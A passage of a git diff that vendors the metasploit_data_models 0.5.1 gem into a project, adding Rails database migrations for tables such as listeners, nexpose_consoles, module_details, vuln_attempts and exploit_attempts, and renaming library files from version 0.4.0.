t.timestamps + t.integer :workspace_id, :null => false, :default => 1 + t.integer :task_id + t.boolean :enabled, :default => true + t.text :owner + t.text :payload + t.text :address + t.integer :port + t.binary :options + end + end + def self.down + drop_table :listeners + end +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110625000001_add_macro_to_listeners_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110625000001_add_macro_to_listeners_table.rb new file mode 100755 index 0000000000..283d102105 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110625000001_add_macro_to_listeners_table.rb @@ -0,0 +1,12 @@ +class AddMacroToListenersTable < ActiveRecord::Migration + + def self.up + add_column :listeners, :macro, :text + end + + def self.down + remove_column :listeners, :macro + end + +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110630000001_add_nexpose_consoles_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110630000001_add_nexpose_consoles_table.rb new file mode 100755 index 0000000000..037af40ae1 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110630000001_add_nexpose_consoles_table.rb @@ -0,0 +1,21 @@ +class AddNexposeConsolesTable < ActiveRecord::Migration + def self.up + create_table :nexpose_consoles do |t| + t.timestamps + t.boolean :enabled, :default => true + t.text :owner + t.text :address + t.integer :port, :default => 3780 + t.text :username + t.text :password + t.text :status + t.text :version + t.text :cert + t.binary :cached_sites + end + end + def self.down + drop_table :nexpose_consoles + end +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110630000002_add_name_to_nexpose_consoles_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110630000002_add_name_to_nexpose_consoles_table.rb new file mode 100755 index 0000000000..9411724344 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110630000002_add_name_to_nexpose_consoles_table.rb @@ -0,0 +1,12 @@ +class AddNameToNexposeConsolesTable < ActiveRecord::Migration + + def self.up + add_column :nexpose_consoles, :name, :text + end + + def self.down + remove_column :nexpose_consoles, :name + end + +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110717000001_add_profiles_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110717000001_add_profiles_table.rb new file mode 100755 index 0000000000..c0b8831bf1 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110717000001_add_profiles_table.rb @@ -0,0 +1,15 @@ +class AddProfilesTable < ActiveRecord::Migration + def self.up + create_table :profiles do |t| + t.timestamps + t.boolean :active, :default => true + t.text :name + t.text :owner + t.binary :settings + end + end + def self.down + drop_table :profiles + end +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110727163801_expand_cred_ptype_column.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110727163801_expand_cred_ptype_column.rb new file mode 100755 index 0000000000..b5fce6fd8f --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110727163801_expand_cred_ptype_column.rb @@ -0,0 +1,9 @@ +class ExpandCredPtypeColumn < ActiveRecord::Migration + def self.up + change_column :creds, :ptype, :string, :limit => 256 + end + def self.down + change_column :creds, :ptype, :string, :limit => 16 + end +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110730000001_add_initial_indexes.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110730000001_add_initial_indexes.rb new file mode 100755 index 0000000000..4085f64843 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110730000001_add_initial_indexes.rb @@ -0,0 +1,85 @@ +class AddInitialIndexes < ActiveRecord::Migration + def self.up + + + add_index :hosts, :address + add_index :hosts, :address6 + add_index :hosts, :name + add_index :hosts, :state + add_index :hosts, :os_name + add_index :hosts, :os_flavor + add_index :hosts, :purpose + + # Removed (conditionally dropped in the next migration) + # add_index :hosts, :comments + + add_index :services, :port + add_index :services, :proto + add_index :services, :state + add_index :services, :name + + # Removed (conditionally dropped in the next migration) + # add_index :services, :info + + add_index :notes, :ntype + + add_index :vulns, :name + + # Removed (conditionally dropped in the next migration) + # add_index :vulns, :info + + add_index :refs, :name + + add_index :web_sites, :vhost + add_index :web_sites, :comments + add_index :web_sites, :options + + add_index :web_pages, :path + add_index :web_pages, :query + + add_index :web_forms, :path + + add_index :web_vulns, :path + add_index :web_vulns, :method + add_index :web_vulns, :name + end + + def self.down + + remove_index :hosts, :address + remove_index :hosts, :address6 + remove_index :hosts, :name + remove_index :hosts, :state + remove_index :hosts, :os_name + remove_index :hosts, :os_flavor + remove_index :hosts, :purpose + remove_index :hosts, :comments + + remove_index :services, :port + remove_index :services, :proto + remove_index :services, :state + remove_index :services, :name + remove_index :services, :info + + remove_index :notes, :ntype + + remove_index :vulns, :name + remove_index :vulns, :info + + remove_index :refs, :name + + remove_index :web_sites, :vhost + remove_index :web_sites, :comments + remove_index :web_sites, :options + + remove_index :web_pages, :path + remove_index :web_pages, :query + + remove_index :web_forms, :path + + remove_index :web_vulns, :path + remove_index :web_vulns, :method + remove_index :web_vulns, :name + end +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110812000001_prune_indexes.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110812000001_prune_indexes.rb new file mode 100755 index 0000000000..54b681f273 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110812000001_prune_indexes.rb @@ -0,0 +1,23 @@ +class PruneIndexes < ActiveRecord::Migration + def self.up + + if indexes(:hosts).map{|x| x.columns }.flatten.include?("comments") + remove_index :hosts, :comments + end + + if indexes(:services).map{|x| x.columns }.flatten.include?("info") + remove_index :services, :info + end + + if indexes(:vulns).map{|x| x.columns }.flatten.include?("info") + remove_index :vulns, :info + end + end + + def self.down + add_index :hosts, :comments + add_index :services, :info + add_index :vulns, :info + end +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110922000000_expand_notes.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110922000000_expand_notes.rb new file mode 100755 index 0000000000..4e77303fa0 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110922000000_expand_notes.rb @@ -0,0 +1,9 @@ +class ExpandNotes < ActiveRecord::Migration + def self.up + change_column :notes, :data, :text + end + def self.down + change_column :notes, :data, :string, :limit => 65536 + end +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110928101300_add_mod_ref_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110928101300_add_mod_ref_table.rb new file mode 100755 index 0000000000..24f16d642f --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110928101300_add_mod_ref_table.rb @@ -0,0 +1,17 @@ +# Probably temporary, a spot to stash module names and their associated refs +# Don't count on it being populated at any given moment. +class AddModRefTable < ActiveRecord::Migration + + def self.up + create_table :mod_refs do |t| + t.string :module, :limit => 1024 + t.string :mtype, :limit => 128 + t.text :ref + end + end + + def self.down + drop_table :mod_refs + end + +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111011110000_add_display_name_to_reports_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111011110000_add_display_name_to_reports_table.rb new file mode 100755 index 0000000000..f0c54fed98 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111011110000_add_display_name_to_reports_table.rb @@ -0,0 +1,24 @@ +class AddDisplayNameToReportsTable < ActiveRecord::Migration + + class Report < ActiveRecord::Base + end + + def self.up + + add_column :reports, :name, :string, :limit => 63 + + # Migrate to have a default name. + + Report.find(:all).each do |report| + rtype = report.rtype.to_s =~ /^([A-Z0-9]+)\x2d/i ? $1 : "AUDIT" + default_name = rtype[0,57].downcase.capitalize + "-" + report.id.to_s[0,5] + report.name = default_name + report.save + end + end + + def self.down + remove_column :reports, :name + end + +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111203000000_inet_columns.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111203000000_inet_columns.rb new file mode 100755 index 0000000000..6e86654bc5 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111203000000_inet_columns.rb @@ -0,0 +1,13 @@ +class InetColumns < ActiveRecord::Migration + + def self.up + change_column :hosts, :address, 'INET using address::INET' + remove_column :hosts, :address6 + end + + def self.down + change_column :hosts, :address, :text + add_column :hosts, :address6, :text + end + +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111204000000_more_inet_columns.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111204000000_more_inet_columns.rb new file mode 100755 index 0000000000..56adf64625 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111204000000_more_inet_columns.rb @@ -0,0 +1,17 @@ +class MoreInetColumns < ActiveRecord::Migration + + def self.up + change_column :wmap_requests, :address, 'INET using address::INET' + remove_column :wmap_requests, :address6 + change_column :wmap_targets, :address, 'INET using address::INET' + remove_column :wmap_targets, :address6 + end + + def self.down + change_column :wmap_requests, :address, :string, :limit => 16 + add_column :wmap_requests, :address6, :string, :limit => 255 + change_column :wmap_targets, :address, :string, :limit => 16 + add_column :wmap_targets, :address6, :string, :limit => 255 + end + +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111210000000_add_scope_to_hosts.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111210000000_add_scope_to_hosts.rb new file mode 100755 index 0000000000..2bbe8f9f77 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111210000000_add_scope_to_hosts.rb @@ -0,0 +1,9 @@ +class AddScopeToHosts < ActiveRecord::Migration + def self.up + add_column :hosts, :scope, :text + end + + def self.down + remove_column :hosts, :scope + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120126110000_add_virtual_host_to_hosts.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120126110000_add_virtual_host_to_hosts.rb new file mode 100755 index 0000000000..5e9833d884 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120126110000_add_virtual_host_to_hosts.rb @@ -0,0 +1,9 @@ +class AddVirtualHostToHosts < ActiveRecord::Migration + def self.up + add_column :hosts, :virtual_host, :text + end + + def self.down + remove_column :hosts, :viritual_host + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120411173220_rename_workspace_members.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120411173220_rename_workspace_members.rb new file mode 100755 index 0000000000..75003d6d36 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120411173220_rename_workspace_members.rb @@ -0,0 +1,9 @@ +class RenameWorkspaceMembers < ActiveRecord::Migration + def up + rename_table :project_members, :workspace_members + end + + def down + rename_table :workspace_members, :project_members + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120601152442_add_counter_caches_to_hosts.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120601152442_add_counter_caches_to_hosts.rb new file mode 100755 index 0000000000..fcd2f9e0ca --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120601152442_add_counter_caches_to_hosts.rb @@ -0,0 +1,21 @@ +class AddCounterCachesToHosts < ActiveRecord::Migration + + def self.up + add_column :hosts, :note_count, :integer, :default => 0 + add_column :hosts, :vuln_count, :integer, :default => 0 + add_column :hosts, :service_count, :integer, :default => 0 + + Mdm::Host.reset_column_information + Mdm::Host.all.each do |h| + Mdm::Host.reset_counters h.id, :notes + Mdm::Host.reset_counters h.id, :vulns + Mdm::Host.reset_counters h.id, :services + end + end + + def self.down + remove_column :hosts, :note_count + remove_column :hosts, :vuln_count + remove_column :hosts, :service_count + end +end \ No newline at end of file diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000000_add_vuln_details.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000000_add_vuln_details.rb new file mode 100755 index 0000000000..0f946da39c --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000000_add_vuln_details.rb @@ -0,0 +1,34 @@ +class AddVulnDetails < ActiveRecord::Migration + + def self.up + create_table :vuln_details do |t| + t.integer :vuln_id # Vuln table reference + t.float :cvss_score # 0.0 to 10.0 + t.string :cvss_vector # Ex: (AV:N/AC:L/Au:N/C:C/I:C/A:C)(AV:N/AC:L/Au:N/C:C/I:C/A:C) + + t.string :title # Short identifier + t.text :description # Plain text or HTML (trusted) + t.text :solution # Plain text or HTML (trusted) + t.binary :proof # Should be UTF-8, but may not be, sanitize on output + # Technically this duplicates vuln.info, but that field + # is poorly managed / handled today. Eventually we will + # replace vuln.info + + # Nexpose-specific fields + t.integer :nx_console_id # NexposeConsole table reference + t.integer :nx_device_id # Reference from the Nexpose side + t.string :nx_vuln_id # 'jre-java-update-flaw' + t.float :nx_severity # 0-10 + t.float :nx_pci_severity # 0-10 + t.timestamp :nx_published # Normalized from "20081205T000000000" + t.timestamp :nx_added # Normalized from "20081205T000000000" + t.timestamp :nx_modified # Normalized from "20081205T000000000" + t.text :nx_tags # Comma separated + + end + end + + def self.down + drop_table :vuln_details + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000001_add_host_details.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000001_add_host_details.rb new file mode 100755 index 0000000000..36e70892fa --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000001_add_host_details.rb @@ -0,0 +1,16 @@ +class AddHostDetails < ActiveRecord::Migration + + def self.up + create_table :host_details do |t| + t.integer :host_id # Host table reference + + # Nexpose-specific fields + t.integer :nx_console_id # NexposeConsole table reference + t.integer :nx_device_id # Reference from the Nexpose side + end + end + + def self.down + drop_table :host_details + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000002_expand_details.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000002_expand_details.rb new file mode 100755 index 0000000000..bd240ecdc5 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000002_expand_details.rb @@ -0,0 +1,16 @@ +class ExpandDetails < ActiveRecord::Migration + + def self.up + add_column :vuln_details, :nx_vuln_status, :text + add_column :vuln_details, :nx_proof_key, :text + add_column :vuln_details, :src, :string + add_column :host_details, :src, :string + end + + def self.down + remove_column :vuln_details, :nx_vuln_status + remove_column :vuln_details, :nx_proof_key + remove_column :vuln_details, :src + remove_column :host_details, :src + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000003_expand_details2.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000003_expand_details2.rb new file mode 100755 index 0000000000..4122503692 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000003_expand_details2.rb @@ -0,0 +1,24 @@ +class ExpandDetails2 < ActiveRecord::Migration + + def self.up + add_column :host_details, :nx_site_name, :string + add_column :host_details, :nx_site_importance, :string + add_column :host_details, :nx_scan_template, :string + add_column :host_details, :nx_risk_score, :float + + add_column :vuln_details, :nx_scan_id, :integer + add_column :vuln_details, :nx_vulnerable_since, :timestamp + add_column :vuln_details, :nx_pci_compliance_status, :string + end + + def self.down + remove_column :host_details, :nx_site_name + remove_column :host_details, :nx_site_importance + remove_column :host_details, :nx_scan_template + remove_column :host_details, :nx_risk_score + + remove_column :vuln_details, :nx_scan_id + remove_column :vuln_details, :nx_vulnerable_since + remove_column :vuln_details, :nx_pci_compliance_status + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000004_add_vuln_attempts.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000004_add_vuln_attempts.rb new file mode 100755 index 0000000000..b943fe358f --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000004_add_vuln_attempts.rb @@ -0,0 +1,19 @@ +class AddVulnAttempts < ActiveRecord::Migration + + def self.up + create_table :vuln_attempts do |t| + t.integer :vuln_id # Vuln table reference + t.timestamp :attempted_at # Timestamp of when the session was opened or the module exited + t.boolean :exploited # Whether or not the attempt succeeded + t.string :fail_reason # Short string corresponding to a Msf::Exploit::Failure constant + t.string :username # The user that tested this vulnerability + t.text :module # The specific module name that was used + t.integer :session_id # Database identifier of any opened session + t.integer :loot_id # Database identifier of any 'proof' loot (for non-session exploits) + end + end + + def self.down + drop_table :vuln_attempts + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000005_add_vuln_and_host_counter_caches.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000005_add_vuln_and_host_counter_caches.rb new file mode 100755 index 0000000000..c34101fd89 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000005_add_vuln_and_host_counter_caches.rb @@ -0,0 +1,14 @@ +class AddVulnAndHostCounterCaches < ActiveRecord::Migration + + def self.up + add_column :hosts, :host_detail_count, :integer, :default => 0 + add_column :vulns, :vuln_detail_count, :integer, :default => 0 + add_column :vulns, :vuln_attempt_count, :integer, :default => 0 + end + + def self.down + remove_column :hosts, :host_detail_count + remove_column :vulns, :vuln_detail_count + remove_column :vulns, :vuln_attempt_count + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000006_add_module_details.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000006_add_module_details.rb new file mode 100755 index 0000000000..cb99f7ee84 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000006_add_module_details.rb @@ -0,0 +1,118 @@ +class AddModuleDetails < ActiveRecord::Migration + + def self.up + + create_table :module_details do |t| + t.timestamp :mtime # disk modified time + t.text :file # location on disk + t.string :mtype # exploit, auxiliary, post, etc + t.text :refname # module path (no type) + t.text :fullname # module path with type + t.text :name # module title + t.integer :rank # exploit rank + t.text :description # + t.string :license # MSF_LICENSE + t.boolean :privileged # true or false + t.timestamp :disclosure_date # Mar 10 2004 + t.integer :default_target # 0 + t.text :default_action # "scan" + t.string :stance # "passive" + t.boolean :ready # true/false + end + + add_index :module_details, :refname + add_index :module_details, :name + add_index :module_details, :description + add_index :module_details, :mtype + + create_table :module_authors do |t| + t.integer :module_detail_id + t.text :name + t.text :email + end + add_index :module_authors, :module_detail_id + + create_table :module_mixins do |t| + t.integer :module_detail_id + t.text :name + end + add_index :module_mixins, :module_detail_id + + create_table :module_targets do |t| + t.integer :module_detail_id + t.integer :index + t.text :name + end + add_index :module_targets, :module_detail_id + + create_table :module_actions do |t| + t.integer :module_detail_id + t.text :name + end + add_index :module_actions, :module_detail_id + + create_table :module_refs do |t| + t.integer :module_detail_id + t.text :name + end + add_index :module_refs, :module_detail_id + add_index :module_refs, :name + + create_table :module_archs do |t| + t.integer :module_detail_id + t.text :name + end + add_index :module_archs, :module_detail_id + + create_table :module_platforms do |t| + t.integer :module_detail_id + t.text :name + end + add_index :module_platforms, :module_detail_id + + end + + def self.down + remove_index :module_details, :refname + remove_index :module_details, :name + remove_index :module_details, :description + remove_index :module_details, :mtype + + remove_index :module_authors, :module_detail_id + remove_index :module_mixins, :module_detail_id + remove_index :module_targets, :module_detail_id + remove_index :module_actions, :module_detail_id + remove_index :module_refs, :module_detail_id + remove_index :module_refs, :name + remove_index :module_archs, :module_detail_id + remove_index :module_platform, :module_detail_id + + drop_table :module_details + drop_table :module_authors + drop_table :module_mixins + drop_table :module_targets + drop_table :module_actions + drop_table :module_refs + drop_table :module_archs + drop_table :module_platforms + + end +end + +=begin + +Mdm::Host.find_by_sql(" +SELECT + hosts.id, hosts.address, module_details.mtype AS mtype, module_details.refname AS mname, vulns.name AS vname, refs.name AS vref +FROM + hosts,vulns,vulns_refs,refs,module_refs,module_details +WHERE + hosts.id = vulns.host_id AND + vulns.id = vulns_refs.vuln_id AND + vulns_refs.ref_id = refs.id AND + refs.name = module_refs.name AND + module_refs.module_detail_id = modules_details.id +").map{|x| [x.address, x.mname, x.vname, x.vref ] } + + +=end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000007_add_exploit_attempts.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000007_add_exploit_attempts.rb new file mode 100755 index 0000000000..22d3ec0b1f --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000007_add_exploit_attempts.rb @@ -0,0 +1,26 @@ +class AddExploitAttempts < ActiveRecord::Migration + + def self.up + create_table :exploit_attempts do |t| + t.integer :host_id # Host table reference (primary) + t.integer :service_id # Service table reference (optional) + t.integer :vuln_id # Vuln table reference (optional) + t.timestamp :attempted_at # Timestamp of when the session was opened or the module exited + t.boolean :exploited # Whether or not the attempt succeeded + t.string :fail_reason # Short string corresponding to a Msf::Exploit::Failure constant + t.string :username # The user that tested this vulnerability + t.text :module # The specific module name that was used + t.integer :session_id # Database identifier of any opened session + t.integer :loot_id # Database identifier of any 'proof' loot (for non-session exploits) + t.integer :port # Port -> Services are created/destroyed frequently and failed + t.string :proto # Protocol | attempts may be against closed ports. + end + + add_column :hosts, :exploit_attempt_count, :integer, :default => 0 + end + + def self.down + drop_table :exploit_attempts + remove_column :hosts, :exploit_attempt_count + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000008_add_fail_message.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000008_add_fail_message.rb new file mode 100755 index 0000000000..7d6dd0f96b --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000008_add_fail_message.rb @@ -0,0 +1,12 @@ +class AddFailMessage < ActiveRecord::Migration + + def self.up + add_column :vuln_attempts, :fail_detail, :text + add_column :exploit_attempts, :fail_detail, :text + end + + def self.down + remove_column :vuln_attempts, :fail_detail + remove_column :exploit_attempts, :fail_detail + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120718202805_add_owner_and_payload_to_web_vulns.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120718202805_add_owner_and_payload_to_web_vulns.rb new file mode 100644 index 0000000000..2160e61de6 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120718202805_add_owner_and_payload_to_web_vulns.rb @@ -0,0 +1,13 @@ +class AddOwnerAndPayloadToWebVulns < ActiveRecord::Migration + + def self.up + add_column :web_vulns, :owner, :string + add_column :web_vulns, :payload, :text + end + + def self.down + remove_column :web_vulns, :owner + remove_column :web_vulns, :payload + end + +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20130228214900_change_required_columns_to_null_false_in_web_vulns.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20130228214900_change_required_columns_to_null_false_in_web_vulns.rb new file mode 100644 index 0000000000..bf0f9d7297 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20130228214900_change_required_columns_to_null_false_in_web_vulns.rb @@ -0,0 +1,35 @@ +# Changes all the {COLUMNS} in the web_vulns table that are required for {Mdm::WebVuln}, but were previously +# :null => true +class ChangeRequiredColumnsToNullFalseInWebVulns < ActiveRecord::Migration + # Columns that were previously :null => true, but are actually required to be non-null, so should be + # :null => false + COLUMNS = [ + :category, + :confidence, + :method, + :name, + :params, + :path, + :pname, + :proof, + :risk + ] + # Table in which {COLUMNS} are. + TABLE_NAME = :web_vulns + + # Marks all the {COLUMNS} as :null => true + def down + COLUMNS.each do |column| + change_column_null(TABLE_NAME, column, true) + end + end + + # Marks all the {COLUMNS} as :null => false + def up + COLUMNS.each do |column| + change_column_null(TABLE_NAME, column, false) + end + end + + +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/mdm.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/mdm.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/mdm.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/mdm.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/mdm/host/operating_system_normalization.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/mdm/host/operating_system_normalization.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/mdm/host/operating_system_normalization.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/mdm/host/operating_system_normalization.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/base64_serializer.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/base64_serializer.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/base64_serializer.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/base64_serializer.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/engine.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/engine.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/engine.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/engine.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/serialized_prefs.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/serialized_prefs.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/serialized_prefs.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/serialized_prefs.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/validators/ip_format_validator.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/validators/ip_format_validator.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/validators/ip_format_validator.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/validators/ip_format_validator.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/validators/password_is_strong_validator.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/validators/password_is_strong_validator.rb similarity index 100% rename from 